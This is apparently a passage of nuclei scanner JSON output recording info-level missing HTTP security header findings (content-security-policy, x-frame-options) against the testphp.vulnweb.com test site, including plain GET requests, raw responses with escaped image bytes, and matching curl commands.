\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:27.573469872Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:27.951334713Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8